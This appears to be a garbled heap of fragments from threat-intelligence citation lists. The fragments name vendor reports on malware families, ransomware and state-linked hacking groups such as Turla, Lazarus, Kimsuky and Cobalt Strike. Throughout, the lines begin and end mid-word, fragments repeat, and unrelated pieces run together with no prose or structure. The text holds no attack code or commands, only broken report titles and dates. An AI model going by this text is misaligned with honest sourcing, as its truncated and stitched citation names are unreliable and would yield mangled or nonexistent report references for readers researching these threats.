Shaheen Nov 2018),(Citation: Citizen Lab Group5),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: XAgentOSX 2017),(Citation: Bitd
ec Waterbug Jun 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Palo Alto Shamoon Nov 2016),(Citati

DarkTortilla Aug 2022),(Citation: Leonard TAG 2023),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Zscaler APT31 Covid-19 Octob

WinterVivern 2023),(Citation: Check Point Meteor Aug 2021),(Citation: Bitdefender Naikon April 2021),(Citation: Malwarebytes Higaisa 202
anuary 2020),(Citation: Talos TinyTurla September 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Cylance Dust Stor

Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Kaspe

e 2020),(Citation: Novetta Winnti April 2015),(Citation: Cybereason Chaes Nov 2020),(Citation: IBM MegaCortex),(Citation: Talos TinyTurla

n April 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: TrendMicro TropicTrooper 2015),(Citation: Unit 42 Hildegard M
2020),(Citation: FoxIT Wocao December 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Cybereason

Cobalt Strike Manual 4.3 November 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: JPCert BlackTech Malware September 2
022),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit42 BendyBear Feb 2021),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Bi

(Citation: Mandiant FIN12 Oct 2021),(Citation: Deply Mimikatz),(Citation: CERT-FR PYSA April 2020),(Citation: Github PowerShell Empire),(

ation: Github Koadic),(Citation: Dell TG-3390),(Citation: Microsoft Disable NTLM Nov 2012)
TTCK Oct 2021),(Citation: Cisco H1N1 Part 1),(Citation: CISA SoreFang July 2016),(Citation: Unit 42 Valak July 2020),(Citation: ESET Turla Po
34-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: Proofpoint ZeroT Feb 2017),(Citation: ESET Gamaredon June 2020),(Citation: Mandiant ROA
er BADHATCH Mar 2021),(Citation: GitHub PowerSploit May 2012),(Citation: Trend Micro Muddy Water March 2021),(Citation: Deep Instin

UADAGENT July 2018),(Citation: ClearSky Lazarus Aug 2020),(Citation: CISA Supernova Jan 2021),(Citation: Proofpoint Leviathan Oct 2017)
MSTIC NOBELIUM Mar 2021),(Citation: ESET Turla PowerShell May 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: Group IB Ran

2020),(Citation: Cyberint Qakbot May 2021),(Citation: Symantec RAINDROP January 2021),(Citation: TrendMicro RaspberryRobin 2022),(Ci

1),(Citation: Securelist Sofacy Feb 2018),(Citation: FireEye APT35 2018),(Citation: ESET Lazarus KillDisk April 2018),(Citation: Talos Frankens

work Dec 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Check Point APT34 April 2021),(Citation: Forcepoint Monsoon),
ess July 2020),(Citation: Bitsight Latrodectus June 2024),(Citation: FireEye APT34 Dec 2017),(Citation: Intrinsec Egregor Nov 2020),(Citation

Labs Silent Librarian),(Citation: Proofpoint TA416 Europe March 2022),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Microsoft

ye APT30),(Citation: Cylance Sodinokibi July 2019),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET Operation Spalax Jan 2021),(Cita
affle Sep 2021),(Citation: SCILabs Malteiro 2021),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Lazarus Jun 2020),(Citation: Sym

Citation: Mandiant APT1),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: Zscaler Higaisa 2020),(Citation: ESET Dukes Octo
2021),(Citation: Github PowerShell Empire),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Kaspersky ToddyCat C

0),(Citation: Lazarus APT January 2022),(Citation: Unit 42 Kazuar May 2017),(Citation: CopyKittens Nov 2015),(Citation: Proofpoint Bumble

ovember 2020),(Citation: Telefonica Snip3 December 2021),(Citation: Lookout Dark Caracal Jan 2018),(Citation: MalwareBytes WoodyRAT

20),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Symantec W32.Duqu),(Citation: DFIR Phosphorus November 2021),(Citation:
(Citation: US-CERT BADCALL),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: GitHub PoshC2),(Citation: TrendMi

Prevailion DarkWatchman 2021),(Citation: Rostovcev APT41 2021),(Citation: Sekoia Raccoon2 2022),(Citation: Symantec Daggerfly 2023),(C

g 2017),(Citation: Secureworks GOLD SAHARA),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Huntress INC Ransomware May 2
ovetta Blockbuster),(Citation: FireEye CARBANAK June 2017),(Citation: Mandiant FIN13 Aug 2022),(Citation: Mandiant_UNC2165),(Citation
Advisory GRU Brute Force Campaign July 2021),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: Savill 1999),(Citation: Cyberea

October 2023),(Citation: Fidelis njRAT June 2013),(Citation: Symantec Buckeye),(Citation: FireEye Clandestine Fox),(Citation: Secureworks B

Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Secure List Bad Rabbit),(Citation: DFIR Report APT35 ProxyShell March

aheen Nov 2018),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Citizen Lab Group5),(Citation: XAgentOSX 2017),(Citation: Unit4
dge January 2024),(Citation: Microsoft HAFNIUM March 2020),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: CISA AA20-301A

ason INC Ransomware November 2023),(Citation: Sophos Ragnar May 2020),(Citation: FireEye Ransomware Feb 2020),(Citation: Mcafee C

rsky Ferocious Kitten Jun 2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: CISA AA24-038A PRC Critical Infrastructure Febru
ATT QakBot April 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ESET Gelsemium June 2021),(Cita

eCopy Dec 2021),(Citation: FireEye APT29 Nov 2018),(Citation: Google TAG COLDRIVER January 2024),

inousMoth July 2021),(Citation: Trend Micro TA505 June 2019),(Citation: Symantec Suckfly March 2016),(Citation: ESET Ebury Feb 2014),(C
,(Citation: Unit 42 Valak July 2020),(Citation: NCC Group Black Basta June 2022),(Citation: RedCanary RaspberryRobin 2022),(Citation: Gith
s Feb 2018),(Citation: ESET Telebots July 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: ESET Lazarus Jun 2020),(

tation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: US-CERT BADCALL),(Citation: Unit 42 Kazuar May 201

Croissant April 2020),(Citation: Lumen KVBotnet 2023),(Citation: Mandiant FIN13 Aug 2022),(Citation: FOX-IT May 2016 Mofang),(Citation

May 2023),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Github PowerShell Empire),(Citation: Mandiant
Citation: Korean FSI TA505 2020),(Citation: Talos Konni May 2017),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Cybereason Chaes N

oissant April 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Talos Kimsuk

ub PoshC2),(Citation: Symantec Buckeye),(Citation: US-CERT NotPetya 2017),(Citation: Unit 42 WhisperGate January 2022),(Citation: ESET

ShadowPad Aug 2017),(Citation: BlackBerry CostaRicto November 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Zscaler AP

tion: Kaspersky Adwind Feb 2016),(Citation: group-ib_redcurl2),(Citation: Trend Micro Trickbot Nov 2018),(Citation: FireEye APT34 Webina
,(Citation: Trend Micro Qakbot December 2020),(Citation: FireEye APT30),(Citation: FireEye Operation Saffron Rose 2013),(Citation: ESET O

Sep 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Proofpoint TA505 October 2019),(Citation: ESET Lazarus Jun 2020),(Citation: I
n: Microsoft Star Blizzard August 2022),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: SOCRadar INC Ransom January 2024),(Citati

Naikon April 2021),(Citation: Crowdstrike HuntReport 2022),

on: 360 Machete Sep 2020),(Citation: GitHub Pupy),(Citation: Fortinet Remcos Feb 2017),(Citation: EFF Manul Aug 2016),(Citation: Cofense

n: Securelist APT10 March 2021),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Securit
nny Dec 2014),(Citation: wardle evilquest parti),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Crowdstrike Driv

bee April 2022),(Citation: ESET Operation Spalax Jan 2021),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Symantec Daggerfly 20
ation: Google Election Threats October 2020),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Volexity InkySquid RokRAT August 202

Eye SUNBURST Backdoor December 2020),(Citation: Bromium Ursnif Mar 2017),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Bit
tinet Remcos Feb 2017),(Citation: NCC Group WastedLocker June 2020),(Citation: Novetta Winnti April 2015),(Citation: ClearSky MuddyWa

RONZE BUTLER Oct 2017),(Citation: Symantec Daggerfly 2023),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Microsoft Blac

ation: Kaspersky Poseidon Group),(Citation: GitHub Pupy),(Citation: PowerSploit Documentation),(Citation: CISA AA24-038A PRC Critical In

,(Citation: CISA AA20-301A Kimsuky),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Mandiant APT43 March 2024),(Citation: Mand
g 2017),(Citation: CopyKittens Nov 2015),(Citation: ESET Ebury Feb 2014),(Citation: Securelist Denis April 2017),(Citation: Cisco DNSMessen

,(Citation: Symantec Remsec IOCs),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Proofpoint TA416 Europe March 2022),(Citati

2014),(Citation: US-CERT TA18-074A),(Citation: BiZone Lizar May 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: Novetta-A
,(Citation: FireEye MESSAGETAP October 2019),(Citation: Dell TG-3390),(Citation: ESET InvisiMole June 2018),(Citation: Talos Promethium

msuky June 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: U

tion Muzabi),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET Sednit USBStealer 2014),(Citation: FOX-IT May 2016 Mofang),(Citatio

Leviathan Oct 2017),(Citation: Volexity PowerDuke November 2016),(Citation: Securelist Kimsuky Sept 2013),(Citation: Kaspersky Transpa
2018),(Citation: Github Koadic),(Citation: Cybereason Astaroth Feb 2019),(Citation: Mandiant ROADSWEEP August 2022),(Citation: CheckP

),(Citation: FireEye APT34 Dec 2017),(Citation: Symantec Whitefly March 2019),(Citation: Malwarebytes DarkComet March 2018),(Citation

erVivern 2023),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Kaspersk

Oct 2017),(Citation: CrowdStrike StellarParticle January 2022),(Citation: FireEye Operation Double Tap),(Citation: Mandiant FIN13 Aug 202
1 ),(Citation: synack 2016 review),(Citation: Cybereason Chaes Nov 2020),(Citation: Google Election Threats October 2020),(Citation: Check
on: Red Canary NETWIRE January 2020),(Citation: objsee mac malware 2017),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Glitch-Cat
1),(Citation: Cylance Dust Storm),(Citation: Kaspersky WIRTE November 2021),(Citation: Bromium Ursnif Mar 2017),(Citation: Palo Alto Com
Mosquito Jan 2018),(Citation: McAfee Night Dragon),(Citation: Talos Seduploader Oct 2017),(Citation: Unit42 BabyShark Feb 2019),(Citation
Citation: US-CERT Bankshot Dec 2017),(Citation: Mandiant FIN12 Oct 2021),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: LogRhythm W
uary 2019),(Citation: GitHub Mimikatz lsadump Module),(Citation: NCSC Joint Report Public Tools),(Citation: Unit 42 MuddyWater Nov 201

Citation: Deply Mimikatz),(Citation: Github PowerShell Empire),(Citation: F-Secure The Dukes),(Citation: Fidelis njRAT June 2013),(Citation:

Feb 2015),(Citation: Unit42 Xbash Sept 2018),(Citation: mandiant_apt44_unearthing_sandworm),(Citation: Secureworks REvil September 2

Mandiant Suspected Turla Campaign February 2023),(Citation: Crowdstrike Qakbot October 2020),(Citation: Fidelis njRAT June 2013),(Citati
),(Citation: Trend Micro AvosLocker Apr 2022),(Citation: Arxiv Avaddon Feb 2021),(Citation: Microsoft BlackCat Jun 2022),(Citation: Cisco T

r),(Citation: Malwarebytes Kimsuky June 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Kroll RawPOS Jan 2017),(Citation: M

mentation),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Talos TinyTurla September 2021),(Citation: DFIR Conti Bazar Nov 2
C Group Fivehands June 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: ESET Kobalos Jan 2021),(Citation: FireEye Metam

e Indrik November 2018),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Bitdefender LuminousMoth July 2021),(Citation

tic Wolf Akira 2023),(Citation: Harmj0y Domain Trusts)

ation: Picus Sodinokibi January 2020),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Securelist Machete Aug 2014),(

(Citation: Prevailion DarkWatchman 2021),(Citation: BlackBerry CostaRicto November 2020),(Citation: ESET Zebrocy May 2019),(Citation:
urchu, Eric Chien February 2011),(Citation: ESET Gazer Aug 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Secur
ete July 2019),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citatio

Talos Rocke August 2018),(Citation: SOCRadar INC Ransom January 2024),(Citation: ClearkSky Fox Kitten February 2020),(Citation: Talos Z
Talos Cobalt Strike September 2020),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Unit42 Xbash Sept 2018),(Citation: Forcepo

21-1732 Feb 2021),(Citation: ESET Carberp March 2012),(Citation: DBAPPSecurity BITTER zero-day Feb 2021),(Citation: ESET InvisiMole Jun
Petya 2017),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET),(Citation: Wikipedia Control Flo
unearthing_sandworm),(Citation: Secureworks REvil September 2019),(Citation: Cycraft Chimera April 2020),(Citation: MSTIC NOBELIUM M
21),(Citation: Unit 42 Valak July 2020),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 2019),(Citation: Nicolas Falliere, Liam O
2021),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Symantec Remsec IOCs),(Citation: NCC Group Fivehands June 2021),(Citati
: MSTIC Nobelium Toolset May 2021),(Citation: NCC Group WastedLocker June 2020),(Citation: TrendMicro MacOS April 2018),(Citation: R

4 Dec 2017),(Citation: Check Point Meteor Aug 2021),(Citation: Cybereason Astaroth Feb 2019),(Citation: Unit 42 Gorgon Group Aug 2018)

Library Search Order)

te Ratel July 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: PWC C
R PYSA April 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citatio

tion: Crowdstrike HuntReport 2022),

,(Citation: Trustwave Cherry Picker),(Citation: Volexity PowerDuke November 2016),(Citation: Securelist Kimsuky Sept 2013),(Citation: Kas

tSecret),(Citation: ESET OceanLotus macOS April 2019),(Citation: Novetta Winnti April 2015),(Citation: Scarlet Mimic Jan 2016),(Citation: N

y 2023),(Citation: Unit 42 Kazuar May 2017),(Citation: Lab52 WIRTE Apr 2019),(Citation: Trend Micro Daserf Nov 2017),(Citation: Trend Mi
),(Citation: Picus Sodinokibi January 2020),(Citation: Microsoft BlackCat Jun 2022),(Citation: McAfee Babuk February 2021),(Citation: Fortin

AgentOSX 2017),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Securelist BlackEnergy Nov 2014),(Citation: ESET Machete July 20
lto Shamoon Nov 2016),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Linux FTP),(Citation: Dragos Crashoverride 2018),(Citation

Zscaler APT31 Covid-19 October 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Cita

tion: Malwarebytes Higaisa 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Crowdstrike HuntReport 2022),(Citation: U
1),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 2019),(Citation: Secure List Bad Rabbit),(Citation: DFIR Report APT35 ProxyS

March 2022),(Citation: Kaspersky WIRTE November 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Unit 42 C0d0

rtex),(Citation: Talos TinyTurla September 2021),(Citation: Unit42 BendyBear Feb 2021),(Citation: Avertium Black Basta June 2022),(Citatio

,(Citation: Unit 42 Hildegard Malware),(Citation: BitDefender BADHATCH Mar 2021),(Citation: SOCRadar INC Ransom January 2024),(Citati
er 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: DFIR_Quantu

ckTech Malware September 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: Cyberreason Anchor December 2019),(Citation
Hound Feb 2017),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: DFIR Phosphorus November 2021),(Citation: U

: Github PowerShell Empire),(Citation: Symantec Buckeye),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Tick Apr

2020),(Citation: ESET Turla PowerShell May 2019),(Citation: FireEye FiveHands April 2021),(Citation: ESET Carbon Mar 2017),(Citation: Kas
020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Check Point Black Basta October 2022),(Citation: Palo Alto Comnie),
ch 2021),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Microsoft Unidentified Dec 2018),(Citation: Kaspersky Lyceum October 2021),

roofpoint Leviathan Oct 2017),(Citation: Talos Smoke Loader July 2018),(Citation: ESET Operation Spalax Jan 2021),(Citation: Carbon Black
2019),(Citation: Group IB Ransomware September 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Elastic Pikabot 2024),

icro RaspberryRobin 2022),(Citation: Securelist Dropping Elephant),(Citation: SentinelOne Valak June 2020),(Citation: Joint Cybersecurity A

018),(Citation: Talos Frankenstein June 2019),(Citation: Cylance Cleaver),(Citation: ESET Lazarus Jun 2020),(Citation: FireEye APT33 Guardr

itation: Forcepoint Monsoon),(Citation: Palo Alto T9000 Feb 2016),(Citation: Kaspersky Adwind Feb 2016),(Citation: Nicolas Falliere, Liam O
ec Egregor Nov 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Unit 42 Playbook Dec 2017),

gust 2020),(Citation: Microsoft Targeting Elections September 2020),(Citation: Microsoft Star Blizzard August 2022),(Citation: Microsoft Anti

peration Spalax Jan 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: AhnLab Andariel
azarus Jun 2020),(Citation: Symantec Emotet Jul 2018),(Citation: IBM Grandoreiro April 2020),(Citation: Zscaler Bazar September 2020),(Ci

20),(Citation: ESET Dukes October 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Unit42 BabyShark Feb 2019),(Citation: FoxIT W
Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: BlackBerry CostaRicto November 2020),(Citation: Kaspersky ShadowPad

),(Citation: Proofpoint Bumblebee April 2022),(Citation: Lotus Blossom Dec 2015),(Citation: CISA ComRAT Oct 2020),(Citation: BlackBerry C

on: MalwareBytes WoodyRAT Aug 2022),(Citation: Cyberreason Anchor December 2019),(Citation: Red Canary NETWIRE January 2020),(C

rus November 2021),(Citation: Trend Micro Ngrok September 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: CISA AA21-200A
ub PoshC2),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky ToddyCat June 2022),(Citation: Mandiant Cutting Edge January 202

n: Symantec Daggerfly 2023),(Citation: FireEye CARBANAK June 2017),(Citation: Talos Bisonal Mar 2020),(Citation: Novetta Blockbuster),(C

ntress INC Ransomware May 2024),(Citation: Costa AvosLocker May 2022),(Citation: Arctic Wolf Akira 2023),
Mandiant_UNC2165),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: U
Savill 1999),(Citation: Cybereason Royal December 2022),(Citation: ESET Hermetic Wizard March 2022),(Citation: CrowdStrike StellarPartic

e Fox),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET Hermetic Wi

eport APT35 ProxyShell March 2022),(Citation: ESET Gazer Aug 2017),(Citation: Kaspersky WIRTE November 2021),(Citation: ESET Carbon

entOSX 2017),(Citation: Unit42 Cannon Nov 2018),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Securelist BlackEnergy Nov 201
22),(Citation: CISA AA20-301A Kimsuky),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: US-CERT TA18-074A),(Citation: CISA AA20

Feb 2020),(Citation: Mcafee Clop Aug 2019),(Citation: Check Point Meteor Aug 2021),(Citation: Mandiant ROADSWEEP August 2022),(Cita

C Critical Infrastructure February 2024),(Citation: Cybereason Kimsuky November 2020),(Citation: Cylance Dust Storm),(Citation: Kandji Cu
T Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: ESET PipeMon May 2020),(Citation: TrendMicro RaspberryRobin 2

ation: ESET Ebury Feb 2014),(Citation: Janicab),(Citation: Symantec Tick Apr 2016),(Citation: ESET Hermetic Wizard March 2022),(Citation:
erryRobin 2022),(Citation: Github Covenant),(Citation: Github Koadic),(Citation: Sophos Ragnar May 2020),(Citation: Cybereason Astaroth F
tion: ESET Lazarus Jun 2020),(Citation: Symantec Briba May 2012),(Citation: Red Canary Qbot),(Citation: Cyberint Qakbot May 2021),(Citati

ation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Skidmap),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: BlackBerry CostaRi

T May 2016 Mofang),(Citation: Talos Kimsuky Nov 2021),(Citation: McAfee GhostSecret),(Citation: BiZone Lizar May 2021),(Citation: Talos

ell Empire),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citatio
,(Citation: Cybereason Chaes Nov 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cylance Dust Storm),(Citation: FireEye APT4

g 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky Poseidon Group),(Cita

January 2022),(Citation: ESET Hermetic Wizard March 2022),(Citation: ESET LoudMiner June 2019),(Citation: Trend Micro Iron Tiger April 2

une 2021),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: PWC Yellow Liderc 2023),(Citation: Unit42 Azorult Nov 2018),(Citatio

tation: FireEye APT34 Webinar Dec 2017),(Citation: group-ib_redcurl1),

n Rose 2013),(Citation: ESET Operation Spalax Jan 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: FOX-IT May 2016 Mofa

T Lazarus Jun 2020),(Citation: IBM Grandoreiro April 2020),(Citation: Zscaler Bazar September 2020),(Citation: Cybereason Bumblebee Aug
C Ransom January 2024),(Citation: Ukraine15 - EISAC - 201603),(Citation: NCC Group LAPSUS Apr 2022),(Citation: Sygnia Emperor Dragonfl

ul Aug 2016),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Kaspersky Adwind Feb 2016),(Citatio

e 2020),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: Telefonica Snip3 December 2021),(Citation: Symantec Daggerfly 20
16),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Malwarebytes Pony April 2016),(Citation: TrendMicro Ursnif File Dec 2014

tation: Symantec Daggerfly 2024),(Citation: Intezer Doki July 20),(Citation: ClearSky Pay2Kitten December 2020),(Citation: MalwareBytes L
InkySquid RokRAT August 2021),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Forcepoint

oolset May 2024),(Citation: Bitdefender Agent Tesla April 2020),(Citation: NCC Group Chimera January 2021),(Citation: Cybereason Soft Ce
,(Citation: ClearSky MuddyWater Nov 2018),(Citation: Microsoft FinFisher March 2018),(Citation: Cybereason Kimsuky November 2020),(C

2022),(Citation: Microsoft BlackCat Jun 2022),(Citation: Mandiant FIN13 Aug 2022),(Citation: TechNet Dsquery),(Citation: CrowdStrike Bloo

ISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Palo Alto OilRig May 2016),(Citation: Symantec W32.Duqu),(Citation: C

3 March 2024),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: SecureWorks August 201
17),(Citation: Cisco DNSMessenger March 2017),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Kaspersky ShadowPad Aug 2017)

16 Europe March 2022),(Citation: Proofpoint TA505 Jan 2019),(Citation: DFIR_Sodinokibi_Ransomware),(Citation: TrendMicro Taidoor),(Ci

ary 2020),(Citation: Novetta-Axiom),(Citation: TrendMicro Patchwork Dec 2017),(Citation: objsee mac malware 2017),(Citation: CISA WellM
),(Citation: Talos Promethium June 2020),

plomacy Jun 2021),(Citation: Unit42 Agrius 2023),(Citation: Microsoft NICKEL December 2021),(Citation: Antiy CERT Ramsay April 2020),(Cit

-IT May 2016 Mofang),(Citation: Palo Alto Rover),(Citation: ESET Zebrocy May 2019),(Citation: McAfee GhostSecret),(Citation: Red Canary N

3),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye APT30),(Citation: FireEye Operation Double Tap),(Citation: Carbon
August 2022),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Unit42 Redaman Januar

kComet March 2018),(Citation: FireEye FiveHands April 2021),(Citation: OilRig ISMAgent July 2017),(Citation: Mandiant ROADSWEEP Augu

ruary 2023),(Citation: Kaspersky MoleRATs April 2019),(Citation: Hornet Security Avaddon June 2020),(Citation: Proofpoint TA505 June 201

tion: Mandiant FIN13 Aug 2022),(Citation: Mandiant FIN7 Apr 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Crowdstrike Helix Kitten
October 2020),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Symantec Seaduke 2
Jan 2019),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: ESET Ebury May 2024),(Citation: 20 macOS Common Tools and T
r 2017),(Citation: Palo Alto Comnie),(Citation: McAfee Honeybee),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: ESET Turla Lunar t
BabyShark Feb 2019),(Citation: Unit 42 MechaFlounder March 2019),(Citation: FoxIT Wocao December 2019),(Citation: McAfee Gold Drag
2017),(Citation: LogRhythm WannaCry),(Citation: ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: ESET PipeMo
Unit 42 MuddyWater Nov 2017),(Citation: Prevx Carberp March 2011),(Citation: Cybereason Astaroth Feb 2019),(Citation: FireEye APT34

is njRAT June 2013),(Citation: Symantec Buckeye),(Citation: Rostovcev APT41 2021),(Citation: Volexity InkySquid BLUELIGHT August 2021)

ecureworks REvil September 2019),(Citation: FireEye Shamoon Nov 2016),(Citation: Unit42 Agrius 2023),(Citation: Palo Alto Shamoon Nov

idelis njRAT June 2013),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Prevailion DarkWatchm
at Jun 2022),(Citation: Cisco Talos Avos Jun 2022),(Citation: CarbonBlack Conti July 2020),(Citation: McAfee Cuba April 2021),(Citation: Tal

RawPOS Jan 2017),(Citation: Microsoft SIR Vol 19),(Citation: Symantec W32.Duqu),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Kand

itation: DFIR Conti Bazar Nov 2021),(Citation: NCSC Joint Report Public Tools),(Citation: Cylance Dust Storm),(Citation: DOJ APT10 Dec 2018
2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: Zscaler Higaisa 2020),(Citation: Unit 42 Shamoon3 2018),(Citation: Chronicle Winn

inousMoth July 2021),(Citation: therecord_redcurl),

ecurelist Machete Aug 2014),(Citation: Leonard TAG 2023),(Citation: Secureworks IRON HUNTER Profile),(Citation: Symantec Patchwork),(C

Zebrocy May 2019),(Citation: Group IB GrimAgent July 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: MalwareBytes Woo
cember 2020),(Citation: Securelist WhiteBear Aug 2017),(Citation: Palo Alto Comnie),(Citation: Nccgroup Gh0st April 2018),(Citation: ESET
ason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: ESET Casbaneiro Oct 2019),(Citation: RotaJakiro 2021 netlab360

bruary 2020),(Citation: Talos ZxShell Oct 2014),(Citation: Check Point Havij Analysis),(Citation: Sygnia Emperor Dragonfly October 2022),(Ci
Sept 2018),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Microsoft DUBNIUM June 2016),(Citation: Gigamon Berserk Bear Oc

),(Citation: ESET InvisiMole June 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: ESET T3 Threat Report 2021),(Citation: A
Citation: Wikipedia Control Flow Integrity)
,(Citation: MSTIC NOBELIUM Mar 2021),(Citation: NCSC APT29 July 2020),(Citation: FireEye APT41 Aug 2019),(Citation: CrowdStrike Scatter
